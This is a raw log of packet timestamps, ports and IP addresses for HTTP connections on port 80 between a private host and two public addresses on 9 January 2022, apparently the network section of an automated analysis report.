Jan 9, 2022 18:48:40.763561964 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763598919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763609886 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763638020 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763678074 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763684988 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763715982 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763755083 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763757944 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763791084 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763823032 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763834953 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763864040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763900995 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763911963 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763937950 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763986111 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763986111 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764022112 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764029026 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764060020 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764070988 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764100075 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764137030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764147997 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764177084 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764214039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764220953 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764252901 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764292002 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764297962 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764328957 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764367104 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764372110 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764404058 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764441013 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764451027 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764477968 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764508009 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764523029 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764547110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764585972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764592886 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764621973 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764661074 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764666080 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.764691114 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.764735937 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.765295029 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.823560953 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823620081 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823661089 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823698044 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823695898 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.823735952 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823748112 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.823775053 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823816061 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823827028 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.823856115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823895931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823903084 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.823935986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823975086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.823982954 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824018955 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824059010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824069977 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824098110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824135065 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824141979 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824173927 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824213028 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824218035 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824250937 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824290037 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824294090 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824326038 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824364901 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824368954 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824403048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824440002 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824450016 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824479103 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824512959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824522972 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824553013 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824593067 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824596882 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824630022 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824668884 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824688911 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824706078 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824743986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824754953 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.824771881 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.824817896 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.898358107 CET	80	49859	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:40.899785995 CET	80	49859	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:41.022264957 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022320032 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022361994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022403955 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.022411108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022454023 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022471905 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.022500992 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022546053 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022552013 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.022592068 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022631884 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022644997 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.022679090 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022723913 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022728920 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.022767067 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022809982 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022825003 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.022855997 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022895098 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022919893 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.022943974 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.022985935 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023000002 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.023032904 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023076057 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023086071 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.023118973 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023161888 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023175955 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.023206949 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023251057 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023258924 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.023294926 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023328066 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023350000 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.023375034 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023415089 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.023427963 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.023977041 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024027109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024075985 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024085045 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024116039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024152040 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024168968 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024214029 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024219990 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024260998 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024302959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024312973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024354935 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024401903 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024409056 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024442911 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024483919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024508953 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024532080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024573088 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024586916 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024629116 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024671078 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024678946 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024715900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024760962 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024768114 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024804115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024878025 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024919987 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.024934053 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024975061 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.024991989 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.025024891 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025063992 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025087118 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025116920 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025147915 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025190115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025228977 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.025240898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025274038 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.025295973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.025646925 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025687933 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025732994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025741100 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.025775909 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025827885 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025865078 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.025878906 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.025929928 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.025983095 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026032925 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026074886 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026087999 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.026118994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026163101 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026170969 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.026206017 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026251078 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026253939 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.026293039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026336908 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026341915 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.026381969 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026423931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026431084 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.026468039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026510954 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026516914 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.026551962 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026595116 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026602030 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.026639938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026673079 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.026691914 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.026695967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026740074 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026772022 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.026787996 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.027285099 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027328014 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027359962 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.027374029 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027420044 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027422905 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.027465105 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027508020 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027513981 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.027553082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027600050 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.027600050 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027642012 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027686119 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027692080 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.027726889 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027774096 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027774096 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.027817011 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027862072 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027863979 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.027904987 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027949095 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.027952909 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.027992010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028038979 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028038979 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028084993 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028089046 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028131962 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028136969 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028175116 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028223991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028223991 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028265953 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028307915 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028316975 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028352976 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028382063 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028403997 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028426886 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028470993 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028477907 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028516054 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028554916 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028568029 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028600931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028641939 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028655052 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028685093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028728008 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028736115 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028773069 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028817892 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028824091 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.028894901 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028935909 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.028949976 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.030909061 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.032321930 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.062786102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.062841892 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.062870026 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.062887907 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.062931061 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.062944889 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.062975883 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063023090 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063033104 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063070059 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063119888 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063122988 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063164949 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063206911 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063219070 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063251972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063294888 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063303947 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063339949 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063380957 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063416004 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063431978 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063467026 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063512087 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063563108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063565016 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063591003 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063611984 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063657045 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063662052 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063698053 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063743114 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063746929 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063786030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063829899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063832998 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063868046 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063910961 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.063913107 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.063954115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.064009905 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.064012051 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.064049006 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.064097881 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.237205982 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237252951 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237293959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237348080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237354040 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.237385035 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237433910 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.237435102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237478018 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237514973 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237545967 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.237565041 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237596989 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.237615108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237654924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237695932 CET	80	49854	211.169.6.249	192.168.2.3
